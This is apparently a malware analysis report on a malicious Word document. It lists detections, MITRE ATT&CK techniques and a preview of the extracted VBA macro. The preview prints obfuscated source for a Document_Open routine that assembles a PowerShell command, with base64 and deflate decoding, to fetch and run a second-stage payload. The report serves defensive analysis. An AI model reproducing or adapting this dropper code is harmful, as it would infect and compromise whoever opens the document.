MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains a VBA macro with a Document_Open auto-execution routine. This macro is designed to execute a PowerShell command that downloads and runs a second-stage payload from a remote URL. The presence of the Shell() call and the specific obfuscated PowerShell command strongly indicate a downloader functionality.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6605695-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6605695-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17597 bytes |
SHA-256: 0e9ac262efd5d02a9b620f3e1bf31caf405f09645a222c92c5ad7e2907b10405 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OlhHEAHaUAAwuS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
SZrspI = 49177 - TCZXAk + 7297 - klJYwP + 57858 * jHjArE
wrirzk = 11911 - jlYmpu + 58622 - cLODQ + 29526 * BqFjXH
tdCvKL = 64630 - YmPTCF + 83714 - qdiwsW + 32732 * cpoZO
jEFifSDnakQM ("" + JGMwCpRCh + rsiRmdv + ZOupG + EjHSIIs + qwBJwpcob + vYYfERnq + dvfhonrnwzMpG)
NvFSC = 35125 - wRTwb + 35334 - YJKGi + 28775 * JUADi
XVVamt = 20481 - SKiuB + 53066 - Yqbaw + 32932 * puCLvE
hSVXI = 25761 - YGXdj + 23755 - ZqspC + 85652 * pvABh
End Sub
Attribute VB_Name = "PXajawz"
Function ZOupG()
On Error Resume Next
mjNDd = (MMmmPK / LOOiVK + zjLmzd - olDHiW)
UYzQMWuEmX = "pow" + aWHiAPhiWj + LjwaNPXGXb + "er" + EXbjihn + toIObwhwjPT + "sh" + dCEjUHoa + SHdcowApszpRuq + "e" + SpHrLkkwtZiz + bEzppGzTtAj + "l" + SSLHOUipwTF + XhiPTCcMWlUE + "l " + owwGKmJ + iRQdiqclsCG + "." + ldhdzNvhr + OtqCMuAZ + "( " + AwCZwWu + BvVZNSYhpvW + "$" + ODOkAZYzCjiLk + DwrBiPBRsUd + "e" + NLdiIJkzLOWUb + OrNdntdqEVNbMm + "Nv" + XqkkqDvCa + skVjGlCDBHz + ":C" + kUZMviXNqwziqu + vKCsOkGj + "OM" + qJiTIXtq + ijHrXSClVC + "sp" + usGwzEfzOqYos + WpckAumjMDK + "ec["
iUNmqz = 30187 - NMZpKA / nKSwI / fvtRPw - 14398 * ttmjj * (33153 + dmwtwo * dCvqu + tBkMMI)
llSoHsiu = "4,2" + UaCIiUSnG + OKYUFKzWSrWZ + "6" + SrJaWbOUJSX + JoKOoPLQidPGB + ",2" + GbzBAfMcJNj + tAGzPUqiHd + "5]-" + qMkOtTVT + iUVpKzMBB + "j" + qWhWSrhRz + OrJTcNPtOflfSl + "Oin" + JtVFbdtApC + cnBlOkGifrV + "''" + HqlFrPlqRXYc + lwJiZVnRad + ")" + ifztSYWUU + uwmGkKPd + "( " + NVfWMvdzqQ + ahFtYFz + "new" + CwqOjnODGK + vUKSXFdsWiWAp + "-ob" + ArmKdDw + oHjHOujFHO + "JE" + vbAAWNDX + ZIhOMUAVnzJnd + "c" + VdbuRsbtsF + JHptnvziYaAi + "T s" + lafDHzk + jbdJwzP + "y" + wjqOzGVr + AvdsfLGANpzR + "St" + GGRKmzkIkrmf + dZhQRBaFGi + "EM"
rzBzLi = 64476 - IrpLF / wsKlGA / jXoHjA - 99702 * AziNo * (15856 + HljHwH * ljWLl + ivVcw)
LJtfFu = ".io" + MsiihzIsGz + KkZFzCpVmE + ".cO" + OwZEiGQnAN + BcQIFtdZuNszW + "mPr" + uLmnHIIQlZD + hcXzpjD + "E" + jPsbLaADciOd + NanktMfiCfc + "sS" + pvHpMGIiX + ziPhzVwWLBK + "iO" + wKJGwNM + ILIUsBXMw + "n.D" + HnKzzljhFjQ + FtCwCjKihd + "E" + ZccwzwE + uIzMJMjfsnrfk + "fL" + zbKQfwaJltXIDk + MLfKkDjsTdCo + "A" + YoNdzYoopvUz + lEdvmFiUE + "TE"
wrSwB = mSCViu + mhtYV * (ploRGP * 1600 + 13813 / kDDkI)
KqiDJjkhI = "STr" + VroAijLzCJDI + GwUOdHaL + "EA" + nkizRwl + BXjhjHEdTEFz + "m" + YwEQtltGKKnNzw + EXsXDoZRkHZ + "(" + GbCooJCM + ZruMWtVKGSozh + "[i" + sjXnfmLQzDi + JoITVjSfJc + "O." + OzSLSHuzNv + ZDFObuIoIwB + "mEM" + UiBmvjHU + ptEhwnnLN + "Or" + uSaEEOTOPRv + zdtKSLR + "Y" + mPUWNLAU + CfaLaiqVoGAwt + "S" + jTudsCz + jKjiBHOujIzW + "tR" + SbcqdEJnW + dsFrskEMqf + "EAM" + ITjrFSlsfNCbBQ + ObsoGNYPID + "]"
FSijM = qQXVVm + EpSOnJ * (RwnXN * 84285 + 48500 / ifkFZ)
uJjmD = TWwMDV + joPpiq * (YjzOna * 85357 + 89556 / RjCiNz)
QYYwpX = XWDWY + ZiMMz * (MRwck * 48551 + 53505 / dBrXlT)
uAdIWRD = "[" + hPwRaiEODpoYMZ + JTIJiHVUVUlrkP + "C" + fukwosoirZUYD + FWlwFrPQ + "on" + dvGwNinczsRoLK + ZSEnzRVKjUw + "v" + AQdKEKzi + vjvGHsQLbfa + "e" + LmwMZvQsfUVwcn + zUznoJHC + "rT]"
SPJXo = jTSXHz + mWlQL * (JfEmEb * 21229 + 55746 / IBfuBM)
iHjoN = VGwCw + RDtvb * (hOcEv * 55989 + 7283 / KQrNv)
zAkFCcPzsvC = "::" + CIilvWijFZ + LFHkSAiOX + "F" + DkIwFOlG + vAlQqFK + "RO" + zVOltEIHuvfuzY + AnYdRUTcQPE + "M" + cvUjbiqozO + HqLGHzcpppRlCi + "BAs" + mVdAmnS + LWtFmBZf + "E6" + iIVJRcji + ijwAnBiksKT + "4S" + uvbjjCos + TAuQLLYFJf + "TRi" + fZsSlXpmVrG + NqtzbwkcJdA + "n" + SYUFJroRQBqR + DTBctzpzV + "G(" + hhlBVwsY + QSPhOJK + "'VZ" + CfKhhIIBGwvUD + bKCQvFzsQMmBmu + "DL" + fAjcbXAEsNvlc + NcRGEHtCkFnt + "bsI" + HVHbIPUXNWEJzX + MQLcZZUo + "wF" + lwwXoifJlroJ + PqPvCuJWUasXh + "ER/" + iASBbiWaph + ompVCwWNiJZ + "J"
XPdWiR = nnDqVI + KsPZNc * (UjiEq * 51626 + 21370 / nYbhVE)
DPfYIBmVksR = "YtI" + LQdrBiz
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.